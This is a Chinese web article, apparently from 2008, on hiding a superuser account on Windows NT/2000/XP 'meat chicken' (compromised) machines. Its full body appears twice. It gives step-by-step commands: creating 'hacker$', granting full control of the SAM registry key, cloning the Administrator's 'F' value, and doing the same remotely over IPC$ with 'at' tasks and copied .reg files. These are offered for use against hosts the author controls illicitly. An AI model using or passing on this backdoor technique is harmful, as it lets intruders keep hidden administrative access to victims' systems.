系統(tǒng)中多種隱藏超級用戶添加方法第1/2頁
更新時間:2008年07月17日 23:47:31 作者:
我們可以從防范的角度出發(fā),如果查找隱藏用戶
一、如何在圖形界面建立隱藏的超級用戶
圖形界面下適用本地或開3389終端服務(wù)的肉雞上。上面我提到的那位作者說的方法很好,但是較為復(fù)雜,還要用到psu.exe(讓程序以系統(tǒng)用戶身份運(yùn)行的程序),如果在肉雞上的話還要上傳psu.exe。我說的這個方法將不用到psu.exe這個程序。因?yàn)閃indows2000有兩個注冊表編輯器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe實(shí)為一個程序,修改鍵值的權(quán)限時在右鍵中點(diǎn)“權(quán)限”來修改。對regedit.exe我想大家都很熟悉,但卻不能對注冊表的項(xiàng)鍵設(shè)置權(quán)限,而regedt32.exe最大的優(yōu)點(diǎn)就是能夠?qū)ψ员淼捻?xiàng)鍵設(shè)置權(quán)限。NT/2000/xp的帳戶信息都在注冊表的HKEY_LOCAL_MACHINESAMSAM鍵下,但是除了系統(tǒng)用戶SYSTEM外,其它用戶都無權(quán)查看到里面的信息,因此我首先用regedt32.exe對SAM鍵為我設(shè)置為“完全控制”權(quán)限。這樣就可以對SAM鍵內(nèi)的信息進(jìn)行讀寫了了。具體步聚如下:
1、假設(shè)我們是以超級用戶administrator登錄到開有終端服務(wù)的肉雞上的,首先在命令行下或帳戶管理器中建立一個帳戶:hacker$,這里我在命令行下建立這個帳戶
net user hacker$ 1234 /add
2、在開始/運(yùn)行中輸入:regedt32.exe并回車來運(yùn)行regedt32.exe。
3、點(diǎn)“權(quán)限”以后會彈出窗口
點(diǎn)添加將我登錄時的帳戶添加到安全欄內(nèi),這里我是以administrator的身份登錄的,所以我就將administrator加入,并設(shè)置權(quán)限為“完全控制”。這里需要說明一下:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會帶來一系列不必要的問題。等隱藏超級用戶建好以,再來這里將你添加的帳戶刪除即可。
4、再點(diǎn)“開始”→“運(yùn)行”并輸入“regedit.exe”回車,啟動注冊表編輯器regedit.exe。打開鍵:
HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"
5、將項(xiàng)hacker$、00000409、000001F4導(dǎo)出為hacker.reg、409.reg、1f4.reg,用記事本分別打這幾個導(dǎo)出的文件進(jìn)行編輯,將超級用戶對應(yīng)的項(xiàng)000001F4下的鍵“F”的值復(fù)制,并覆蓋hacker$對應(yīng)的項(xiàng)00000409下的鍵“F”的值,然后再將00000409.reg與hacker.reg合并。
6、在命令行下執(zhí)行net user hacker$ /del將用戶hacker$刪除:
net user hacker$ /del
7、在regedit.exe的窗口內(nèi)按F5刷新,然后打文件-導(dǎo)入注冊表文件將修改好的hacker.reg導(dǎo)入注冊表即可
8、到此,隱藏的超級用戶hacker$已經(jīng)建好了,然后關(guān)閉regedit.exe。在regedt32.exe窗口內(nèi)把HKEY_LOCAL_MACHINESAMSAM鍵權(quán)限改回原來的樣子(只要刪除添加的帳戶administrator即可)。
9、注意:隱藏的超級用戶建好后,在帳戶管理器看不到hacker$這個用戶,在命令行用“net user”命令也看不到,但是超級用戶建立以后,就不能再改密碼了,如果用net user命令來改hacker$的密碼的話,那么在帳戶管理器中將又會看這個隱藏的超級用戶了,而且不能刪除。
二、如何在命令行下遠(yuǎn)程建立隱藏的超級用戶
在這里將用at的命令,因?yàn)橛胊t產(chǎn)生的計(jì)劃任務(wù)是以系統(tǒng)身份運(yùn)行的,所以也用不到psu.exe程序。為了能夠使用at命令,肉雞必須開有schedule的服務(wù),如果沒有開啟,可用流光里帶的工具netsvc.exe或sc.exe來遠(yuǎn)程啟動,當(dāng)然其方法也可以,只要能啟動schedule服務(wù)就行。
對于命令行方式,你可以采用各種連接方式,如用SQLexec連接MSSQL的1433端口,也可以用telnet服務(wù),只要以你能得到一個cmdshell,并且有運(yùn)行at命令的權(quán)限就可以。
1、首先找到一臺肉雞,至于如何來找那不是我這里所說的話題。這里先假設(shè)找到一臺超級用戶為administrator,密碼為12345678的肉雞,現(xiàn)在我們開始在命令行下遠(yuǎn)程為它建立隱藏的超級用戶。(例子中的主機(jī)是我的局域網(wǎng)內(nèi)的一臺主機(jī),我將它的ip地址改為13.50.97.238,,請勿在互聯(lián)網(wǎng)上對號入座,以免騷擾正常的ip地址。)
2、先與肉雞建立連接,命令為:net use 13.50.97.238ipc$ "12345678" /user:"administrator
3、用at命令在肉雞上建立一個用戶(如果at服務(wù)沒有啟動,可用小榕的netsvc.exe或sc.exe來遠(yuǎn)程啟動):
at 13.50.97.238 12:51 c:\winntsystem32net.exe user hacker$ 1234 /add
建立這個加有$符的用戶名,是因?yàn)榧佑?符后,命令行下用net user將不顯示這個用戶,但在帳戶管理器卻能看到這個用戶。
4、同樣用at命令導(dǎo)出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下鍵值:
at 13.50.97.238 12:55 c:\winntregedit.exe /e hacker.reg
HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/e 是regedit.exe的參數(shù),在_LOCAL_MACHINESAMSAMDomainsaccountusers這個鍵的一定要以結(jié)尾。必要的情況下可以用引號將“c:\winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起來。
5、將肉雞上的hacker.reg下載到本機(jī)上用記事本打開進(jìn)行編輯命令為:
copy 13.50.97.238admin$system32hacker.reg c:\hacker.reg
修改的方法圖形界中已經(jīng)介紹過了,這里就不作介紹了。
6、再將編輯好的hacker.reg拷回肉雞上
copy c:\hacker.reg 13.50.97.238admin$system32hacker1.reg
7、查看肉雞時間:net time 13.50.97.238 然后用at命令將用戶hacker$刪除:
at 13.50.97.238 13:40 net user hacker$ /del
8、驗(yàn)證hacker$是否刪除:用
net use 13.50.97.238 /del 斷開與肉雞的連接。
net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帳戶hacker$與肉雞連接,不能連接說明已刪除。
9、再與肉雞建立連接:net use 13.50.97.238ipc$ "12345678" /user:"administrator"再取得肉雞時間,用at命令將拷回肉雞的hacker1.reg導(dǎo)入肉雞注冊表:
at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg
regedit.exe的參數(shù)/s是指安靜模式。
10、再驗(yàn)證hacker$是否已建立,方法同上面驗(yàn)證hacker$是否被刪除一樣。
11、再驗(yàn)證用戶hacker$是否有讀、寫、刪的權(quán)限,如果不放心,你還可驗(yàn)證是否能建立其它帳戶。
12、通過11可以斷定用戶hacker$具有超級用戶權(quán)限,因?yàn)樽畛跷矣胊t命令建立它的時候是一個普通用戶,而現(xiàn)在卻具有遠(yuǎn)程讀、寫、刪的權(quán)限。
圖形界面下適用本地或開3389終端服務(wù)的肉雞上。上面我提到的那位作者說的方法很好,但是較為復(fù)雜,還要用到psu.exe(讓程序以系統(tǒng)用戶身份運(yùn)行的程序),如果在肉雞上的話還要上傳psu.exe。我說的這個方法將不用到psu.exe這個程序。因?yàn)閃indows2000有兩個注冊表編輯器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe實(shí)為一個程序,修改鍵值的權(quán)限時在右鍵中點(diǎn)“權(quán)限”來修改。對regedit.exe我想大家都很熟悉,但卻不能對注冊表的項(xiàng)鍵設(shè)置權(quán)限,而regedt32.exe最大的優(yōu)點(diǎn)就是能夠?qū)ψ员淼捻?xiàng)鍵設(shè)置權(quán)限。NT/2000/xp的帳戶信息都在注冊表的HKEY_LOCAL_MACHINESAMSAM鍵下,但是除了系統(tǒng)用戶SYSTEM外,其它用戶都無權(quán)查看到里面的信息,因此我首先用regedt32.exe對SAM鍵為我設(shè)置為“完全控制”權(quán)限。這樣就可以對SAM鍵內(nèi)的信息進(jìn)行讀寫了了。具體步聚如下:
1、假設(shè)我們是以超級用戶administrator登錄到開有終端服務(wù)的肉雞上的,首先在命令行下或帳戶管理器中建立一個帳戶:hacker$,這里我在命令行下建立這個帳戶
net user hacker$ 1234 /add
2、在開始/運(yùn)行中輸入:regedt32.exe并回車來運(yùn)行regedt32.exe。
3、點(diǎn)“權(quán)限”以后會彈出窗口
點(diǎn)添加將我登錄時的帳戶添加到安全欄內(nèi),這里我是以administrator的身份登錄的,所以我就將administrator加入,并設(shè)置權(quán)限為“完全控制”。這里需要說明一下:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會帶來一系列不必要的問題。等隱藏超級用戶建好以,再來這里將你添加的帳戶刪除即可。
4、再點(diǎn)“開始”→“運(yùn)行”并輸入“regedit.exe”回車,啟動注冊表編輯器regedit.exe。打開鍵:
HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"
5、將項(xiàng)hacker$、00000409、000001F4導(dǎo)出為hacker.reg、409.reg、1f4.reg,用記事本分別打這幾個導(dǎo)出的文件進(jìn)行編輯,將超級用戶對應(yīng)的項(xiàng)000001F4下的鍵“F”的值復(fù)制,并覆蓋hacker$對應(yīng)的項(xiàng)00000409下的鍵“F”的值,然后再將00000409.reg與hacker.reg合并。
6、在命令行下執(zhí)行net user hacker$ /del將用戶hacker$刪除:
net user hacker$ /del
7、在regedit.exe的窗口內(nèi)按F5刷新,然后打文件-導(dǎo)入注冊表文件將修改好的hacker.reg導(dǎo)入注冊表即可
8、到此,隱藏的超級用戶hacker$已經(jīng)建好了,然后關(guān)閉regedit.exe。在regedt32.exe窗口內(nèi)把HKEY_LOCAL_MACHINESAMSAM鍵權(quán)限改回原來的樣子(只要刪除添加的帳戶administrator即可)。
9、注意:隱藏的超級用戶建好后,在帳戶管理器看不到hacker$這個用戶,在命令行用“net user”命令也看不到,但是超級用戶建立以后,就不能再改密碼了,如果用net user命令來改hacker$的密碼的話,那么在帳戶管理器中將又會看這個隱藏的超級用戶了,而且不能刪除。
二、如何在命令行下遠(yuǎn)程建立隱藏的超級用戶
在這里將用at的命令,因?yàn)橛胊t產(chǎn)生的計(jì)劃任務(wù)是以系統(tǒng)身份運(yùn)行的,所以也用不到psu.exe程序。為了能夠使用at命令,肉雞必須開有schedule的服務(wù),如果沒有開啟,可用流光里帶的工具netsvc.exe或sc.exe來遠(yuǎn)程啟動,當(dāng)然其方法也可以,只要能啟動schedule服務(wù)就行。
對于命令行方式,你可以采用各種連接方式,如用SQLexec連接MSSQL的1433端口,也可以用telnet服務(wù),只要以你能得到一個cmdshell,并且有運(yùn)行at命令的權(quán)限就可以。
1、首先找到一臺肉雞,至于如何來找那不是我這里所說的話題。這里先假設(shè)找到一臺超級用戶為administrator,密碼為12345678的肉雞,現(xiàn)在我們開始在命令行下遠(yuǎn)程為它建立隱藏的超級用戶。(例子中的主機(jī)是我的局域網(wǎng)內(nèi)的一臺主機(jī),我將它的ip地址改為13.50.97.238,,請勿在互聯(lián)網(wǎng)上對號入座,以免騷擾正常的ip地址。)
2、先與肉雞建立連接,命令為:net use 13.50.97.238ipc$ "12345678" /user:"administrator
3、用at命令在肉雞上建立一個用戶(如果at服務(wù)沒有啟動,可用小榕的netsvc.exe或sc.exe來遠(yuǎn)程啟動):
at 13.50.97.238 12:51 c:\winntsystem32net.exe user hacker$ 1234 /add
建立這個加有$符的用戶名,是因?yàn)榧佑?符后,命令行下用net user將不顯示這個用戶,但在帳戶管理器卻能看到這個用戶。
4、同樣用at命令導(dǎo)出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下鍵值:
at 13.50.97.238 12:55 c:\winntregedit.exe /e hacker.reg
HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/e 是regedit.exe的參數(shù),在_LOCAL_MACHINESAMSAMDomainsaccountusers這個鍵的一定要以結(jié)尾。必要的情況下可以用引號將“c:\winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起來。
5、將肉雞上的hacker.reg下載到本機(jī)上用記事本打開進(jìn)行編輯命令為:
copy 13.50.97.238admin$system32hacker.reg c:\hacker.reg
修改的方法圖形界中已經(jīng)介紹過了,這里就不作介紹了。
6、再將編輯好的hacker.reg拷回肉雞上
copy c:\hacker.reg 13.50.97.238admin$system32hacker1.reg
7、查看肉雞時間:net time 13.50.97.238 然后用at命令將用戶hacker$刪除:
at 13.50.97.238 13:40 net user hacker$ /del
8、驗(yàn)證hacker$是否刪除:用
net use 13.50.97.238 /del 斷開與肉雞的連接。
net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帳戶hacker$與肉雞連接,不能連接說明已刪除。
9、再與肉雞建立連接:net use 13.50.97.238ipc$ "12345678" /user:"administrator"再取得肉雞時間,用at命令將拷回肉雞的hacker1.reg導(dǎo)入肉雞注冊表:
at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg
regedit.exe的參數(shù)/s是指安靜模式。
10、再驗(yàn)證hacker$是否已建立,方法同上面驗(yàn)證hacker$是否被刪除一樣。
11、再驗(yàn)證用戶hacker$是否有讀、寫、刪的權(quán)限,如果不放心,你還可驗(yàn)證是否能建立其它帳戶。
12、通過11可以斷定用戶hacker$具有超級用戶權(quán)限,因?yàn)樽畛跷矣胊t命令建立它的時候是一個普通用戶,而現(xiàn)在卻具有遠(yuǎn)程讀、寫、刪的權(quán)限。
相關(guān)文章
win2003中的w3wp.exe進(jìn)程大量占用cpu資源的各種問題解決方法
發(fā)生此問題是因?yàn)?Jet 數(shù)據(jù)庫引擎中存在缺陷。 Microsoft Windows Server 2003 上只會出現(xiàn)此問題。2010-06-06windows server 2016 域環(huán)境搭建的方法步驟(圖文)
本文主要介紹了windows server 2016 域環(huán)境搭建的方法步驟,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧2022-06-06使用ISAPI_Rewrite做簡單實(shí)用的301重定向
現(xiàn)在很多人都使用虛擬主機(jī),而在域名越來越便宜,注冊也越來越容易的的情況下,大家的網(wǎng)站可能經(jīng)常更換域名,把舊的域名替換為新的,但是又不想丟失以前域名的流量,那就要使用301重定向。2010-07-07windows 服務(wù)器 目錄 安全詳細(xì)設(shè)置(PJblog 博客)
轉(zhuǎn)自金刀客兄弟的Blog,刀客兄的服務(wù)器安全功底很扎實(shí),拜讀過他的很多文章.我的博客也放在刀客兄的服務(wù)器上,所以自然是對自己Blog的安全性很放心.2009-07-07IIS+PHP+MySQL環(huán)境中PHP.INI需要注意的幾個地方
一般我們在windows系統(tǒng)中,配置iis+php運(yùn)行環(huán)境,需要注意的地方,大家可以參考下2013-02-02windows?server?2019開啟iis服務(wù)器+tp5.1的完美配置運(yùn)行流程
這篇文章主要介紹了windows?server?2019開啟iis服務(wù)器+tp5.1的配置,本文通過圖文并茂的形式給大家介紹的非常詳細(xì),對大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下2022-03-03IIS6批量添加主機(jī)頭 IIS6批量綁定主機(jī)頭(利用IIS6導(dǎo)入導(dǎo)出XML)
因?yàn)閷is6添加了很多的主機(jī)頭,如果一個一個的添加很累,所以想到了批量添加,經(jīng)過測試發(fā)現(xiàn),可以用如下方法2012-12-12